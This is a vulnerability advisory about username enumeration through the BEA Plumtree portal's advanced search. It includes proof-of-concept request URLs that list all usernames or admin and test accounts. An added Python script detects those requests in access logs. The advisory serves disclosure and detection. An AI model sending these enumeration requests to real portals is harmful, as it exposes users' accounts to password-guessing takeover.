PR06-11: BEA Plumtree portal search facility leaks usernames to unauthenticated users
Description:
BEA Plumtree portal 6.0 is vulnerable to username leakage through the search
facility.
By performing an advanced search, unauthenticated users can enumerate valid
usernames with a single HTTP request. Wildcards are allowed in searches, which
means that substrings can be used in order to target specific username types
such as admin usernames and test usernames.
Note: this username enumeration weakness _doesn't_ require attackers to perform
dictionary or brute-force attacks in order to obtain usernames.
Date Found: 12th September 2006
Vendor contacted: 18th May 2007
Vulnerable: BEA Plumtree 5.0.2, 5.0.3, 5.0.4, 6.0.1.218452 and possibly other
versions.
Severity: Medium
Authors: Adrian Pastor, Jan Fry and Richard Brain of ProCheckUp Ltd
(www.procheckup.com)
ProCheckUp thanks BEA for working with us.
Proof of concept:
The following request returns all usernames ('*' wildcard), showing a maximum of
100 usernames per page:
https://[hostname]/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and
The wildcard '*' character can also be combined in the 'in_tx_fulltext'
parameter with strings.
The following request enumerates usernames that contain the substring 'admin'
within them:
https://[hostname]/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*admin*&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and
The following request enumerates usernames that contain the substring 'test'
within them:
https://[hostname]/portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*test*&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and
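As an added detection example (not part of the ProCheckUp advisory), the following Python scans web-server access logs for advanced-search requests whose in_tx_fulltext term carries the '*' wildcard, the pattern of the requests above. The log lines are constructed, and the Common Log Format layout is an assumption about the deployment.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format) for this example.
# Lines 1 and 2 reproduce the PR06-11 search pattern (the second with the
# wildcard URL-encoded as %2A); lines 3 and 4 are benign portal traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Sep/2006:10:01:02 +0100] "GET /portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and HTTP/1.1" 200 51234
10.0.0.5 - - [12/Sep/2006:10:01:09 +0100] "GET /portal/server.pt?in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=%2Aadmin%2A&in_hi_req_apps=1&control=advancedstart&in_hi_req_page=100&parentname=AdvancedSearch&in_ra_topoperator=and HTTP/1.1" 200 4120
10.0.0.7 - - [12/Sep/2006:10:02:30 +0100] "GET /portal/server.pt?space=SearchResult&in_tx_fulltext=quarterly+report&control=advancedstart HTTP/1.1" 200 9000
10.0.0.9 - - [12/Sep/2006:10:03:00 +0100] "GET /portal/server.pt?space=Login HTTP/1.1" 200 3000
"""

# Common Log Format: client ip, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def flag_wildcard_user_searches(log_text):
    """Return (client ip, timestamp, decoded search term) for every request that
    matches the PR06-11 pattern: an advanced search on /portal/server.pt
    (space=SearchResult, control=advancedstart) whose in_tx_fulltext term
    contains the '*' wildcard."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/portal/server.pt"):
            continue
        q = parse_qs(parts.query)  # URL-decodes, so %2A becomes '*'
        if q.get("space") != ["SearchResult"] or q.get("control") != ["advancedstart"]:
            continue
        term = q.get("in_tx_fulltext", [""])[0]
        if "*" in term:
            hits.append((m.group("ip"), m.group("ts"), term))
    return hits


if __name__ == "__main__":
    for ip, ts, term in flag_wildcard_user_searches(SAMPLE_LOG):
        print(f"{ts} {ip} wildcard advanced search: {term!r}")
```

Correlating the flagged requests with the portal's session or authentication logs separates unauthenticated enumeration from a logged-in user's legitimate wildcard search.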
Consequences:
Valid usernames can be easily enumerated by attackers. This includes usernames
with administrative privileges on Plumtree portal. Considering that Plumtree
portal setups don't enforce password complexity requirements, and many
usernames are usually available, it is highly likely that an attacker can
hijack accounts that use easy-to-guess passwords.
Fix: this has been addressed in AquaLogic Interaction 6.1 MP1. It can also be
addressed by making configuration changes in ALUI 6.x versions.
References:
http://www.procheckup.com/Vulnerability_2007.php
http://dev2dev.bea.com/pub/advisory/254
http://www.plumtree.com/